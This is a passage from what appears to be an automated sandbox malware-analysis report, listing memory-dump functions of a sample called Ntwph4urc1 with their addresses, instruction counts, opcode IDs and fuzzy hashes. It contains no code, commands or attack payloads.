                                            • Instruction Fuzzy Hash: 7B3175B5A103019FE715AF69D850A6677EDEB49B54FB0C07AE605DF381EA31CC81C790
                                            Function 36987505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                            • Instruction ID: 2511806cef69b01b064707beb843a58eab3c3d66e2e3b5a286f93de201d37547
                                            • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                            • Instruction Fuzzy Hash: FA41A279A00726EBEB21CF44C894BBEB7B5EF44745F10445AE8459B201DB34DD41CBE2
                                            Function 3694FF90 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36950058
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                            • API String ID: 0-996340685
                                            • Opcode ID: f860322c86731554ebadd7fd908775ae2b8b827bf7329e0fd76233ba32fad6f1
                                            • Instruction ID: fff4794959b68c0d42cecbe7fa6078cda03b87e2269f6a7386f6058638d03780
                                            • Opcode Fuzzy Hash: f860322c86731554ebadd7fd908775ae2b8b827bf7329e0fd76233ba32fad6f1
                                            • Instruction Fuzzy Hash: 67416D75A1074A9ED725DFB4C4406EBB7F8BF49310F22482ED6AAD3240E734A545CBA2
                                            Function 369836EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Flst
                                            • API String ID: 0-2374792617
                                            • Opcode ID: a3a865d075a453e853f87248c0b38d66dc8918fafa5574183e277fe864d0116a
                                            • Instruction ID: 6998fbe9835caeffc140caadc78ea6c1a0bc88477225843d698b2415bc423cf5
                                            • Opcode Fuzzy Hash: a3a865d075a453e853f87248c0b38d66dc8918fafa5574183e277fe864d0116a
                                            • Instruction Fuzzy Hash: C641BAB5A05301DFE304CF99C580A16FBE8EB49714F60816EE449CF251EB71D942CBA6
                                            Function 36955096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx
                                            • API String ID: 0-89312691
                                            • Opcode ID: 469fac7bde02f8351db8b6c712528b5208ee193d2356cd89e21d1a37e19bdbeb
                                            • Instruction ID: 673bd8d28db610d2ece6ca94362abbede4852255846f725e82a0c36beae2b46f
                                            • Opcode Fuzzy Hash: 469fac7bde02f8351db8b6c712528b5208ee193d2356cd89e21d1a37e19bdbeb
                                            • Instruction Fuzzy Hash: F7115E74B097128BF724CE2A8850616B799EB9526CF33852BE659CB392DA71DC41C7C0
                                            Function 369D106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrCreateEnclave
                                            • API String ID: 0-3262589265
                                            • Opcode ID: c14a06d2a6f5b8f6c3b1039dba2eb197a67cdc24975d231588a7c90f6b3c6d5b
                                            • Instruction ID: baa80066dca90b13a1086723790e4fbbeaa2feb21f88f63cc986e92c956b2d34
                                            • Opcode Fuzzy Hash: c14a06d2a6f5b8f6c3b1039dba2eb197a67cdc24975d231588a7c90f6b3c6d5b
                                            • Instruction Fuzzy Hash: E721F3B29083449FC311DF6AC844A5BFBE8FBD5B40F504A2FBA9097250D7B1D805CB92
                                            Function 369A739A Relevance: .7, Instructions: 705COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45c6e41ff92b7a69047edec1ecc112c2ee3823ce29ff1f23cca0128e183f57bf
                                            • Instruction ID: 8c1d1cb69a383c4d13dfc0471e71e0f8d81fbf5503740645988fea3b61f56a2e
                                            • Opcode Fuzzy Hash: 45c6e41ff92b7a69047edec1ecc112c2ee3823ce29ff1f23cca0128e183f57bf
                                            • Instruction Fuzzy Hash: 5C429D79E007168FEB18CF59C895AAEB7F6FF88354B248559D451AB340DB34EC42CB90
                                            Function 3697B2C0 Relevance: .6, Instructions: 629COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa8f84c3c331ce5b8622df1ec1800fe59b11c4936ca677904c354cd8dc042a2f
                                            • Instruction ID: a37dd367d2b8c1fc783f1ba8a1ce90a7c187489be247200cad9fe0daeb566cfb
                                            • Opcode Fuzzy Hash: fa8f84c3c331ce5b8622df1ec1800fe59b11c4936ca677904c354cd8dc042a2f
                                            • Instruction Fuzzy Hash: A032ACB6E00219DFDF14CFA9C890BAEBBB5FF84754F240029E805AB385E7359911CB91
                                            Function 36A116CC Relevance: .6, Instructions: 571COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe819d918f428ed92c2e0ea7c61749700c93258a894e5d65d8ff704bc862c41a
                                            • Instruction ID: 479e1e139b2fd72b38ec24491deef66b2e7c54b6673f1f448c61a40712409e3c
                                            • Opcode Fuzzy Hash: fe819d918f428ed92c2e0ea7c61749700c93258a894e5d65d8ff704bc862c41a
                                            • Instruction Fuzzy Hash: 1C22A179E002168FDB09CF59C890AAABBF2FF88354F24856DD8559F341DB34AD42CB90
                                            Function 3695D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a136cdc757e49178528f34d8741ef31fa85830ce69cbd12181fcbfda06d6d906
                                            • Instruction ID: 20fca0a8433a6144f5e3bc7f67ba1ac3011f83a3b4cab436893d1bcd57af2c6b
                                            • Opcode Fuzzy Hash: a136cdc757e49178528f34d8741ef31fa85830ce69cbd12181fcbfda06d6d906
                                            • Instruction Fuzzy Hash: 4CC11174E00316DFEB14CF59C840BAEB7BAEF54754F258268DA20AB384D730E855CB91
                                            Function 3696F460 Relevance: .3, Instructions: 321COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b645cef16ae3f62250407b39a91631b5b4c38ff625ac47b3ba0439ba7c4fecf0
                                            • Instruction ID: 82edc400a6541986b64c6aa58d56cc55b4b51457c370920b7d052421799e6622
                                            • Opcode Fuzzy Hash: b645cef16ae3f62250407b39a91631b5b4c38ff625ac47b3ba0439ba7c4fecf0
                                            • Instruction Fuzzy Hash: 10C12F75E103298BEB14CF1AC990B7973A7FB4476CF25805AEC41AB3A6DB718D41CB90
                                            Function 369790DB Relevance: .3, Instructions: 287COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9db5ddd1c7e8287b1e871d19cb23dbf7441827d913a580da67de7780c98132b7
                                            • Instruction ID: 8868496087a24a71721e89717c3b821c24baf70f9bffcd14ed2eff0ea72f2646
                                            • Opcode Fuzzy Hash: 9db5ddd1c7e8287b1e871d19cb23dbf7441827d913a580da67de7780c98132b7
                                            • Instruction Fuzzy Hash: 6FA155B1910219AFEF12DFA5CC81BAE3BB9EF49754F510064FA00AB2A0D775DC05CBA5
                                            Function 369FB550 Relevance: .3, Instructions: 263COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                            • Instruction ID: b75a22f9a449afd27264e59327f9e746900495da88a1504901f59d992cff233b
                                            • Opcode Fuzzy Hash: 3ff7ac1fed8eb685f2fac3ffbc1061d77b3cb113fc48d4405aa9a5c461cbf6ec
                                            • Instruction Fuzzy Hash: 83A18B75A20601DFD714CF19C480A1AF7FAFF88355B35856AD14ACFA65E732E941CB80
                                            Function 36959486 Relevance: .3, Instructions: 259COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b4ee95f21bd1022282d513179ec6febad223bbbf1e4f256ab51e4f5a6ad8dbdd
                                            • Instruction ID: ba34e40b5cc55acd840c8c016994ac630a6b8f34e42d73d9cf5e9abad104b186
                                            • Opcode Fuzzy Hash: b4ee95f21bd1022282d513179ec6febad223bbbf1e4f256ab51e4f5a6ad8dbdd
                                            • Instruction Fuzzy Hash: 69B15BB89013458FEB15CF29C8806A9B7A9FF04359F718559DE21DB392DB31D853CBA0
                                            Function 36A0B52F Relevance: .2, Instructions: 222COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                            • Instruction ID: 8d0d22f003a897595fa1fbb2ab9acdb9be20fdf63cc0067902c901ced38d3808
                                            • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                            • Instruction Fuzzy Hash: 9971C479E0121A9BDB10CF65EA80ABEB7F5AF44788F55415AEC00AF241E736D941CF90
                                            Function 3697D090 Relevance: .2, Instructions: 217COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                            • Instruction ID: b9108b9738235b82b94c44f5280d1e920930e8c615931428a4aa136f30cbdf10
                                            • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                            • Instruction Fuzzy Hash: BB818E76E0021A8FEF18CF59C8807ADB7BAFFC4384F65816AD815B7344DA71A944CB91
                                            Function 36981FCD Relevance: .2, Instructions: 210COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                            • Instruction ID: 114486e574c45fd86d692cd9cb0877c8940d5e752bbf3e6848127ea0d3641bee
                                            • Opcode Fuzzy Hash: d45cff9eebf7e4d22c1ce3fcc24b15a1b095a5fa2b2ce0eacfdb7ef7a7161c41
                                            • Instruction Fuzzy Hash: 8E81CE74A00306AFD725CF69C980B9ABBF4FF48344F20856AE955CB391D730E980CBA5
                                            Function 369F375F Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c329ba48503779bf361916e37819281d6c998b3b905c90aba9644e7b2896f2b4
                                            • Instruction ID: f760f5ccc814a12d0d02b2b00fc3b13368947802d47de02fa42d71a21494cc05
                                            • Opcode Fuzzy Hash: c329ba48503779bf361916e37819281d6c998b3b905c90aba9644e7b2896f2b4
                                            • Instruction Fuzzy Hash: A7718C75E20228EFDB11CF99C880AADB7B5FF48755F514015E840AB261DB3AEC91CBA1
                                            Function 36A1132D Relevance: .2, Instructions: 188COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2675870aaf1fd649dfd2849724190b40b1e922cd1f93de925ecb22f90637d335
                                            • Instruction ID: 32214c7b9dd42d1c1bb301df78164e6fa1cfb6bc4708ff36d40a54b80895aa7c
                                            • Opcode Fuzzy Hash: 2675870aaf1fd649dfd2849724190b40b1e922cd1f93de925ecb22f90637d335
                                            • Instruction Fuzzy Hash: 09818D75A00205CFDB09CFA9C590AAEBBF1FF48314F1581A9D859EB345D734EA41CBA0
                                            Function 36A1903E Relevance: .2, Instructions: 186COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e49ecedf9a787409a6aab85a98004d1b96b40a45f0e201bac2b82657dd23df32
                                            • Instruction ID: 331882e10698aafc29d9cbab2b82d48ac11b804d0fb0718577da95c03eeb62cc
                                            • Opcode Fuzzy Hash: e49ecedf9a787409a6aab85a98004d1b96b40a45f0e201bac2b82657dd23df32
                                            • Instruction Fuzzy Hash: 8061ABB5608716AFD315CF65CC80BABBBE9FF88754F004619EC5A87240DB34E911CBA2
                                            Function 36A192A6 Relevance: .2, Instructions: 174COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c5fff5ead6d764d7835c90a7fc1bd8e6c15d007910fca8b89423a4e54d3ba638
                                            • Instruction ID: 6cd12b364bb690a6fced346d7456dd9d30b35b50e57de09f7972ffd463d8f83e
                                            • Opcode Fuzzy Hash: c5fff5ead6d764d7835c90a7fc1bd8e6c15d007910fca8b89423a4e54d3ba638
                                            • Instruction Fuzzy Hash: EB61147560C7528FE301CF66C894B9AB7E4BF80758F15446DEC9A8F281DB35E806CB82
                                            Function 369F3F90 Relevance: .2, Instructions: 171COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 47dbf7a01520d9f6a02e5faca9d5eadfc9a54e5df853c88c8eadbc6217b68d16
                                            • Instruction ID: 09b36c056e23309dcd4a28ca34c19fc64d6d8a2d94e412f7e0f129f694a3df95
                                            • Opcode Fuzzy Hash: 47dbf7a01520d9f6a02e5faca9d5eadfc9a54e5df853c88c8eadbc6217b68d16
                                            • Instruction Fuzzy Hash: 9451DF71628301DFD700CF29C840A2BB7E9EFA8755F66892DF455CB241E772D815CBA2
                                            Function 36A0BFC0 Relevance: .2, Instructions: 162COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                            • Instruction ID: b34115f39d203a3bb8b11963ece1b03ff06e6836cc9c7818c1a08ba1d1c26498
                                            • Opcode Fuzzy Hash: 560d1a90ac210632884dd5a0a744483c9fa966326aad27594260bc11b19a8f02
                                            • Instruction Fuzzy Hash: 2A51E679D00216DADB04DF55EC90ABEB3B9FF42784B50805EEC568F241EB35C982CBA0
                                            Function 369CD5D0 Relevance: .2, Instructions: 161COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                            • Instruction ID: 6ddc4b634e0a572a7e92c376039973b8cc7002ccec49b73cc7c5b6fa0916dee0
                                            • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                            • Instruction Fuzzy Hash: 9B5115BAA007129BDB01DF618D40A7B77E9EF88284F600429F944C7251EB34C95AD7E3
                                            Function 3698B570 Relevance: .2, Instructions: 161COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
